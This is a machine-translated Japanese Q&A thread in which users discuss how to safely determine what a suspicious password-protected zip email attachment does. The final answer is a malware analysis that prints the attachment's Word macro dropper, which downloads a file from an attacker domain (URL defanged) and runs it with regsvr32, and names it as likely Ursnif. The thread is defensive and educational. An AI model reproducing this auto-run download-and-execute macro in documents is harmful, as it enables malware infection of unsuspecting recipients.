web-dev-qa-db-ja.com

感染することなく、パスワードで保護されたアーカイブの脅威の性質をすばやく見つける方法は?

最近、既存のサポートグループの電子メールボックスから、次の特徴を持つ電子メールを受信しました。

  • 会社の本社で使用されている言語で書かれている(主要なコミュニケーション言語である英語とは異なる)
  • zip添付ファイルがありました
  • 添付ファイルの明確なパスワードを提供します
  • 数か月前に同僚から受け取った正当な電子メールの返信です

これは記述されているものと似ているようです here なので、感染したファイルを受け取る可能性が非常に高くなります。数時間後、セキュリティ部門から、社内で発生した同様のケースに関連するメールが送信されました。

安全な方法で脅威の正確な性質を見つける方法について疑問に思っています。私は次のことを試しました(会社内の最初のステップのみ、残りはVM内)。

  • virusTotalでチェックしましたが、エンジンが暗号化されたアーカイブをスキャンできないため、0%の検出を受け取りました。
  • Nanoav でチェックされ、パスワードで保護されたアーカイブのスキャンについて自慢していますが、パスワードの入力は許可されていません
  • 7Zipでアーカイブを開き、内部のドキュメントを見ました
  • 7Zipを使用してファイルを抽出し、 VirusTotalにドキュメントをアップロード => 13以上のエンジンが奇妙なものを検出しました。

アーカイブをプレビューして抽出すると、セキュリティ上のリスクが発生しますか、それとも感染できるのは内部のドキュメントのみですか? (この場合はマクロを使用しているようです)。

質問:パスワードで保護されたアーカイブの脅威の性質を、感染することなく正確にすばやく見つける方法は?

9
Alexei

安全な方法で脅威の正確な性質を見つける方法について疑問に思っています

マルウェアの分析を自分で行うのはかなり困難です。マルウェアは、リバースエンジニアリングが簡単にできないように設計されていることがよくあります。あなたの最善の策はVirusTotalの結果を検索することです-残念ながら、特定のマルウェアが正確に何をするかについての明確な情報はないかもしれません。また、マルウェアがサーバーに接続して追加のピースをダウンロードした場合、それらのピースはいつでも、または特定のターゲットに応じて変化する可能性があるため、判別できない可能性があります。

アーカイブをプレビューして抽出すると、セキュリティ上のリスクが発生します

ありそうもないが、たぶん。ほとんどのありふれたマルウェアは、ユーザーがコードを含むファイルをアクティブに実行することに依存しています。これを行うには、いくつかの一般的な方法があります。

  • 最も簡単な方法は、.exeを提供することです。ファイル拡張子を非表示にして不審にしないようにする方法がいくつかあります(Windowsには単にそれらを非表示にするという悪い癖があります)。
  • あまり知られていないファイル形式(.batや.vbsなど)を使用していて、それらも実行可能ファイルである
  • Word文書(または同様の形式)にマクロを埋め込む。そのようなドキュメントを開くと、安全でないマクロの内容を実行するかどうかをたずねられます。多くのユーザーは、このようなプロンプトで「はい」をクリックするように訓練されており、マルウェアの実行につながります。

おそらく、暗号化されたZipは、既知のマルウェアを検出する可能性のある自動化されたスキャナーから悪意のあるコンテンツを隠す方法にすぎません。

ただし、別の可能性もあります。マルウェアには、実行中のソフトウェアの弱点を実際に悪用する可能性があります。これは、古いバージョンを使用していることがわかっている既知の脆弱性(可能性が高い)または未発見の「ゼロデイ」脆弱性(可能性が低い)である可能性があります。その場合、.Zipのような「無害な」フォーマットを表示するだけでシステムの侵害につながる可能性があります(ただし、.zip内で.docxや.pdfなどのはるかに複雑なフォーマットをターゲットにするZip内開かれる可能性がはるかに高くなります)。

いずれにせよ、VMを使用することは間違いなく安全な選択でした。インターネットに接続せず、後で廃棄するようにしてください。セキュリティ部門に連絡して、間違いなく正しいことを行ってください。こと-彼らは脅威をさらに分析する、または少なくともそれらの特定のメールが通過するのをブロックするためのリソースを持っているかもしれません。

8
ManfP

質問:パスワードで保護されたアーカイブの脅威の性質を、感染することなく正確にすばやく見つける方法は?

この質問に答えます。 「迅速な」結果が必要な場合は、マルウェアの動的分析を実行できます。 マルウェアサンドボックスを使用することをお勧めします。

あなたはそこにそれを投げ込みます。走る

  • 誰と通信しようとしているのかがわかります
  • 生成されたファイル
  • 書き込まれるレジストリキー
  • 使用するDLL

上記のこれらの情報を使用して、それが何をするかの大まかな要旨を持っている必要があります。

7
mallocation

VirusTotalなどの静的分析ツールの使用に加えて、サンドボックスアナライザーツールもお勧めします。 hybrid-analysis (私はnotでこのソフトウェアを推奨していますが、具体的な例を示しているだけです)などのオンラインで見つけることができます。

マルウェアの経験がある場合は、バイナリのより詳細な分析を実行して、安全かどうかを判断できます。静的分析、つまりバイナリのウイルススキャンは、高度なマルウェアを防止するには、おそらく最も効率の悪い方法です。

悪意のある個人がファイルを開く前にスキャンすることを期待しているとすると、可能な限り多くのコンテンツを「隠す」ために余分な時間がかかります。これらの手法には、静的インポートテーブルを動的テーブルに置き換える、難読化された文字列(RC4またはAESの可能性がある)をアンパックする、実行時に「プライベートな」Windowsエクスプロイトを利用するRunPEインジェクションメソッドを介して呼び出すなどがあります。

Kasperskyは Securelist と呼ばれるマルウェアに関する非常に優れたブログを実行しており、マルウェアを分析して各ビットの機能と仕組みを説明しています。たとえば、彼らはボットネットの基本( source )に関する記事を持っています。また、マルウェアに関するいわゆるレポートを定期的に公開しているため、最新のセキュリティ開発( source )をすばやく把握できます。彼らのブログは本当に大きいので、私の提案はcategoriesまたはtagsをチェックして、要件に最も適合するものを確認することです。

Ps。カスペルスキーは最近のいくつかの政治的発展を考えると少し熱くなっていることを私は理解していますが、彼らのブログは完全に教育的であり(私との対話に基づいています)、商用のAVソフトウェアとしてのカスペルスキーの承認は決してありません。

3
Alexander K.

メールに含まれている明確なパスワードを含む、その予期しないパスワードで保護されたZip添付ファイルは、私を疑わしいものにします。

パスワードで保護されたすべてのzipが悪意があるとは限りませんが、文書を暗号化して覗き見から保護する場合は、別のメディア(電話など)を介して個別に送信することをお勧めします。これを行うこともまれです。コンテキストも重要になります。おそらく私たちは特定のドキュメントを期待していて、暗号化して送信したいと話しました。または、この人が常にこの方法でドキュメントを送信することを知っています。

それが正当な電子メールの返信であるという事実は、過去により多くの信頼性を与えたかもしれません。 Emotetがキャンペーンでそれを乱用した後ではそうではありません。これは実際に悪意のあるものであるため、「返信」しているメールの受信者が危険にさらされていることを意味します(おそらく最近、おそらく過去に、現在は修正されています。疑わしい場合は、資格情報を変更してください)。

分析するには、通常、抽出したファイルを提供する必要があります。ご指摘のとおり、ファイルプレビューが潜在的なペイロードを予期せずに実行した場合(エクスプロイトなど)、これはリスクをもたらす可能性があります。この特定のケースでは、マクロを無効にして開くだけで安全ですが、マルウェアのサンプルを再生するときに簡単に感染する可能性があります。ドキュメントの調査に仮想マシンを使用したのは良いことです。

ドキュメントを分析すると、それは単なる通常のマクロウイルスです。それを開くと、通常のルアーが表示され、ドキュメントの編集が可能になります(したがって、マクロを実行できます)。 Dieses Dokument wurde in der vorherigen

悪意のあるアクションは、ドキュメントマクロを通じて実行されます。

Sub AutoOpen()
Dim ij As New OG
ij.W Kd("$+1", 0), Kd("$+1", 1)
Dim It As New H

It.b "regsvr32 " + Kd("$+1", 1)
End Sub

クラスOGのメソッドWは、urlmon.dllRLDownloadToFile 関数のラッパーにすぎません。

Public Function W(JQ, i7)
dD = URLDownloadToFile(0&, JQ, i7, 0&, 0&)
End Function

したがって、URL Kd("$+1", 0)をダウンロードしてKd("$+1", 1)に保存します。 Kdは、s()と呼ばれる関数で上記で定義された2つの文字列の1つを返す関数であり、 "$ + 1"文字列とセパレーターとして "%%%"が混在しています。

arr(0) = "h$+1t$+1t$+1p$+1:$+1/$+1/$+1h$+1e$+1r$+1z$+1q$+1v$+1t$+1p$+1b$+19$+19$+1m$+10$+1c$+1n$+1.$+1c$+1o$+1m$+1/$+1g$+1g$+18$+18$+1w$+1"
arr(1) = "y$+1a$+1f$+1t$+1c$+1x$+1r$+17$+1g$+1u$+1/$+1w$+1o$+10$+1z$+1z$+1.$+1p$+1h$+1p$+1?$+1l$+1=$+1s$+1f$+1z$+1s$+18$+1.$+1c$+1a$+1b$+1"
arr(2) = "%$+1%$+1%$+1c$+1:$+1\$+1p$+1r$+1o$+1g$+1r$+1a$+1m$+1d$+1a$+1t$+1a$+1\$+14$+17$+19$+10$+15$+12$+19$+17$+1.$+1d$+1a$+1t$+1"

そのため、hxxp://herzqvtpb99m0cn[.]com/gg88wyaftcxr7gu/wo0zz.php?l=sfzs8.cabからファイルをダウンロードし、c:\programdata\47905297.datに保存します

クラスHのメソッドbはWshShell.execを単に隠しています

要約すると、ドキュメントは、shadyドメインherzqvtpb99m0cn dot com(数日前に登録、2020-05-25T12:23:49Zに登録)からファイルをダウンロードし、c:\programdataに保存して、regsvr32で実行します

そのdnsサーバー(dnspod.com)は現在ドメインを解決していないため、直接分析することができます。

https://urlhaus.abuse.ch/url/369399/ にこのURLのエントリがあります。そこの情報によると、これはUrsnifマルウェアのサンプルでした。

結論:あなたのドキュメントは、おそらくursnifマルウェアファミリーのバイナリである、第2段階を実行するドロッパーです。

2
Ángel